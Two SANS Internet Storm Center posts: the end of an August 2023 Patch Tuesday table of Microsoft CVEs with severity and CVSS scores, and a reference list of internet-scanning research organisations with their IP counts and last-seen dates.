CVE-2023-4077 Insufficient data validation in Extensions %%cve:2023-4077%% No No - - -     Chromium: CVE-2023-4078 Inappropriate implementation in Extensions %%cve:2023-4078%% No No - - -     HEVC Video Extensions Remote Code Execution Vulnerability %%cve:2023-38170%% No No - - Important 7.8 6.8 Memory Integrity System Readiness Scan Tool Defense in Depth Update ADV230004 Yes No - - Moderate     Microsoft Dynamics 365 On-Premises Remote Code Execution Vulnerability %%cve:2023-35389%% No No - - Important 6.5 5.7 Microsoft Dynamics Business Central Elevation Of Privilege Vulnerability %%cve:2023-38167%% No No - - Important 7.2 6.3 Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability %%cve:2023-38157%% No No Less Likely Less Likely Moderate 6.5 5.7 Microsoft Excel Remote Code Execution Vulnerability %%cve:2023-36896%% No No - - Important 7.8 6.8 Microsoft Exchange Remote Code Execution Vulnerability %%cve:2023-35368%% No No - - Important 8.8 7.7 Microsoft Exchange Server Elevation of Privilege Vulnerability %%cve:2023-21709%% No No - - Important 9.8 8.5 Microsoft Exchange Server Remote Code Execution Vulnerability %%cve:2023-38185%% No No - - Important 8.8 7.7 %%cve:2023-35388%% No No - - Important 8.0 7.0 %%cve:2023-38182%% No No - - Important 8.0 7.0 Microsoft Exchange Server Spoofing Vulnerability %%cve:2023-38181%% No No - - Important 8.8 7.7 Microsoft Message Queuing Denial of Service Vulnerability %%cve:2023-36909%% No No - - Important 6.5 5.7 %%cve:2023-36912%% No No - - Important 7.5 6.5 %%cve:2023-35376%% No No - - Important 6.5 5.7 %%cve:2023-38254%% No No - - Important 6.5 5.7 %%cve:2023-35377%% No No - - Important 6.5 5.7 %%cve:2023-38172%% No No - - Important 7.5 6.5 Microsoft Message Queuing Information Disclosure Vulnerability %%cve:2023-36913%% No No - - Important 6.5 5.7 %%cve:2023-35383%% No No - - Important 7.5 6.5 Microsoft Message Queuing Remote Code Execution Vulnerability %%cve:2023-36910%% No No - - Critical 9.8 8.5 %%cve:2023-36911%% No No - - Critical 9.8 8.5 %%cve:2023-35385%% No No - - Critical 9.8 8.5 Microsoft OLE DB Remote Code Execution Vulnerability %%cve:2023-38169%% No No - - Important 8.8 7.7 Microsoft Office Defense in Depth Update ADV230003 Yes Yes - - Moderate     Microsoft Office Remote Code Execution Vulnerability %%cve:2023-35371%% No No - - Important 7.8 6.8 Microsoft Office Visio Remote Code Execution Vulnerability %%cve:2023-36865%% No No - - Important 7.8 6.8 %%cve:2023-36866%% No No - - Important 7.8 6.8 %%cve:2023-35372%% No No - - Important 7.8 6.8 Microsoft Outlook Remote Code Execution Vulnerability %%cve:2023-36895%% No No - - Critical 7.8 6.8 Microsoft Outlook Spoofing Vulnerability %%cve:2023-36893%% No No - - Important 6.5 5.7 Microsoft SharePoint Server Information Disclosure Vulnerability %%cve:2023-36890%% No No - - Important 6.5 5.7 %%cve:2023-36894%% No No - - Important 6.5 5.7 Microsoft SharePoint Server Spoofing Vulnerability %%cve:2023-36891%% No No - - Important 8.0 7.0 %%cve:2023-36892%% No No - - Important 8.0 7.0 Microsoft Teams Remote Code Execution Vulnerability %%cve:2023-29328%% No No - - Critical 8.8 7.7 %%cve:2023-29330%% No No - - Critical 8.8 7.7 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability %%cve:2023-36882%% No No - - Important 8.8 7.7 Microsoft Windows Defender Elevation of Privilege Vulnerability %%cve:2023-38175%% No No - - Important 7.8 6.8 Reliability Analysis Metrics Calculation (RacTask) Elevation of Privilege Vulnerability %%cve:2023-36876%% No No - - Important 7.1 6.2 Reliability Analysis Metrics Calculation Engine (RACEng) Elevation of Privilege Vulnerability %%cve:2023-35379%% No No - - Important 7.8 6.8 Tablet Windows User Interface Application Core Remote Code Execution Vulnerability %%cve:2023-36898%% No No - - Important 7.8 6.8 Visual Studio Tools for Office Runtime Spoofing Vulnerability %%cve:2023-36897%% No No - - Important 8.1 7.3 Windows Bluetooth A2DP driver Elevation of Privilege Vulnerability %%cve:2023-35387%% No No - - Important 8.8 7.7 Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability %%cve:2023-36904%% No No - - Important 7.8 6.8 Windows Common Log File System Driver Elevation of Privilege Vulnerability %%cve:2023-36900%% No No - - Important 7.8 6.8 Windows Cryptographic Services Information Disclosure Vulnerability %%cve:2023-36906%% No No - - Important 5.5 4.8 %%cve:2023-36907%% No No - - Important 5.5 4.8 Windows Fax Service Remote Code Execution Vulnerability %%cve:2023-35381%% No No - - Important 8.8 7.7 Windows Group Policy Security Feature Bypass Vulnerability %%cve:2023-36889%% No No - - Important 5.5 4.8 Windows HTML Platforms Security Feature Bypass Vulnerability %%cve:2023-35384%% No No - - Important 5.4 4.7 Windows Hyper-V Information Disclosure Vulnerability %%cve:2023-36908%% No No - - Important 5.7 5.0 Windows Kernel Elevation of Privilege Vulnerability %%cve:2023-35359%% No No - - Important 7.8 6.8 %%cve:2023-35380%% No No - - Important 7.8 6.8 %%cve:2023-35382%% No No - - Important 7.8 6.8 %%cve:2023-35386%% No No - - Important 7.8 6.8 %%cve:2023-38154%% No No - - Important 7.8 6.8 Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability %%cve:2023-38184%% No No - - Important 7.5 6.5 Windows Mobile Device Management Elevation of Privilege Vulnerability %%cve:2023-38186%% No No - - Important 7.8 6.8 Windows Projected File System Elevation of Privilege Vulnerability %%cve:2023-35378%% No No - - Important 7.0 6.1 Windows Smart Card Resource Management Server Security Feature Bypass Vulnerability %%cve:2023-36914%% No No - - Important 5.5 4.8 Windows System Assessment Tool Elevation of Privilege Vulnerability %%cve:2023-36903%% No No - - Important 7.8 6.8 Windows Wireless Wide Area Network Service (WwanSvc) Information Disclosure Vulnerability %%cve:2023-36905%% No No - - Important 5.5 4.8

See my dashboard for a more detailed breakout: https://patchtuesdaydashboard.com/

--
Renato Marinho
Morphus Labs| LinkedIn|Twitt

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

We have been tracking researchers scanning the Internet for open ports or vulnerabilities for a few years. These groups often show up in our "top 10" lists. We do not make any general recommendations to block these IPs but we want to give you the information you need to make this decision for your network.

First, let's talk about what we consider a "researcher". We consider organizations that scan the internet for open ports or vulnerabilities without exploiting these vulnerabilities. This does not just include academic researchers. We do consider commercial entities part of this group (for example, Shodan being the most prominent one, in my opinion). We have very little information for some entities and essentially take their word for not being malicious.

Our API is the easiest way to obtain a list of current "research" IP addresses. See:

https://isc.sans.edu/api/threatcategory/research (not making this a link on purpose. Please read our introduction to our API first: https://isc.sans.edu/api ). Currently, about 28,000 IPs are part of that list, and we track 30 different entities (not all of them are active)

But the category labels are a bit cryptic, so I am explaining them more here. I am using quotes from their website to describe the service as much as possible.

Please note: Before starting your own effort to scan the internet for "vulnerability X": Please first reach out to the groups below and try to collaborate.

Label # of IPs Last Seen adscore

"ADSCORE’s mission is to categorize web traffic that is organically generated or purchased by your business. It detects the following categories of traffic: human, proxy, low quality (obsolete device and/or browser) and of course, bots."

46 2023-08-06

alphastrikelabs

"Governmental Agencies, national CERTs and Security Teams use our Cyber OSINT platform to identify systems which are exposed on the internet and to analyze how widespread new types of vulnerabilities are."

1025 2023-08-07

arbor

Arbor (used to be https://www.arbor-observatory.com/) is now part of Netscout. "The NETSCOUT Threat Intelligence Team's Internet Safety Initiative works to non-intrusively identify systems & services which may be abused by adversaries to launch DDoS attacks. Analysis of the collected data allows us to proactively defend against attacks leveraging any abusable systems. That is the sole focus of this initiative."

257 2023-08-07

binaryedge

"We scan the entire public internet, create real-time threat intelligence streams, and reports that show the exposure of what is connected to the Internet. What is your Internet Attack Surface?"

9222 2023-08-06

blindferret

no details available

4 2023-08-07

censys

"Censys partners with both the private and public sectors to provide the most accurate internet intelligence data available, so teams can uncover risks and take down threats at scale."

3073 2023-08-07

cybergreen

"The CyberGreen Institute is a 501(c)(3) non-profit organization based in New York that conducts and supports research to establish a science of Cyber Public Health. CyberGreen is a trusted player following transparent methods of identifying sources of risk and best practices for the community. We are committed to evidence-driven metrics and measurements. We welcome collaboration on all fronts. Please contact us to learn more about our organization and how you can be involved with our mission."

3 2023-08-07

erratasec

"Errata Security is a team of dedicated security researchers that practice offensive security. The insight gained from research is delivered to clients through Hacker Eye View reports that cover a variety of topics and real world scenarios."

6 2023-08-07

expanse

"Cortex Expanse" is operated by Palo Alto Networks. "Automatically, continuously scan the entire internet. Actively discover and index your unknown risks in all connected systems and exposed services."

942 2023-08-06

gdnplus

"GDNP layers proprietary and third-party data sets to provide cutting-edge internet research to customers. Our work helps institutions and companies solve data science, business intelligence, and security problems"

57 2023-08-02

internetcensus

"Internet Census Group seeks to analyze trends and benchmark security performance across a broad range of industries.?? We are committed to the education and long-term improvement of security practices across the Internet to provide an ever-stronger defense against the threat of security attacks.??

The Internet Census Group is led by BitSight Technologies, Inc. and we encourage organizations from industry, government or academia that would like to collaborate on security projects to contact us."

668 2023-08-06

internetmeasurement

"This domain is operated by driftnet.io. It is used to discover and measure services that network owners and operators have publicly exposed. Traffic from this domain is not an attack. Traffic from this domain will never attempt to log in to your systems. Spam is not sent from this domain. SPF, DKIM and DMARC records mark internet-measurement.com as completely unable to send email."

359 2023-08-06

ipip

no details available

210 2023-08-07

leakix

"This project goes around the Internet and finds services to index them. We have gather information on the Internet on the most common security misconfiguration currently open. We intend to provide a platform to fix misconfigurations leading to leaks and security issues by bridging the source, CERTs, hosting companies and researchers to solve the problem."

153 2023-08-07

netsystems

no details available

1281 2023-08-07

normshield (now known as Black Kite)

"Our deep insights help you ease the stress of cyber ecosystem risk management. We do this by giving you more than a risk score. Our automated system provides real-time and accurate risk intelligence. Our data is accurate, reliable and detailed so you can improve business resilience by making informed risk decisions across your entire ever-changing cyber ecosystem."

257 2023-08-07

onyphe

"We scan the Internet (and the Dark Web) in a net-neutral manner. That means we scan every exposed assets and your View won't be limited to yours. We even scan the one you are not aware of..."

130 2023-08-06

openportstats

"Welcome to the automatic IoT scanner. We collect statistics about connected devices. You can see information about connected devices to your IP here."

513 2023-08-07

project25499

"The objective of Project 25499 is to leverage internet wide scanning to responsibly identify to scope of vulnerabilities as well as provide researchers with resources needed to combat malice."

3 2023-08-02

qrator

DDoS protection platform

1025 2023-08-07

qualys

Vulnerability scanning service

88 2023-08-07

rapid7sonar

"Project Sonar started in September of 2013 with the goal of improving security through the active analysis of public networks. While the first few months focused almost entirely on SSL, DNS, and HTTP enumeration, the discoveries and insights derived from these datasets, especially around the identification of systems unknown to IT teams, led to the expansion of Project Sonar to include the scanning of UDP services."

417 2023-08-07

scanopticon

".. free and public intelligence gathering service. ... We catalog and fingerprint services in order to track the flow of malware.
When we detect such activity, we make every effort to report it to the appropriate person."

3 2023-08-06

scorecard

SecurityScoreguard assigns organizations a "security score" similar to a credit score. The internet-wide scans are used as part of that score.

21 2023-08-07

shadowserver

"We collect vast amounts of threat data, send tens of thousands of free daily remediation reports, and cultivate strong reciprocal relationships with network providers, national governments and law enforcement. We bring malicious activities and abusable vulnerabilities out of the shadows, expedite their remediation and help to better secure the Internet."

561 2023-08-07

shodan

"Shodan gathers information about all devices directly connected to the Internet. If a device is directly hooked up to the Internet then Shodan queries it for various publicly-available information. The types of devices that are indexed can vary tremendously: ranging from small desktops up to nuclear power plants and everything in between."

68 2023-08-07

spyse

The spyse.com website appears to be down right now, but the scanners are still active. For some discussion about Spyse, see https://hackernoon.com/spyse-introduction-cybersecurity-search-engine-for-data-gathering-90763wz8

231 2023-08-06

stretchoid

"Stretchoid is a platform that helps identify an organization's online services." (I recently saw a website providing access to the data collected by Stretchoid, but forgot to write down the name).

6646 2023-08-06

univmichigan

University of Michigan research effort

764 2023-08-07

univsydney

University of Syndey research effort

4 2023-08-07

 

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.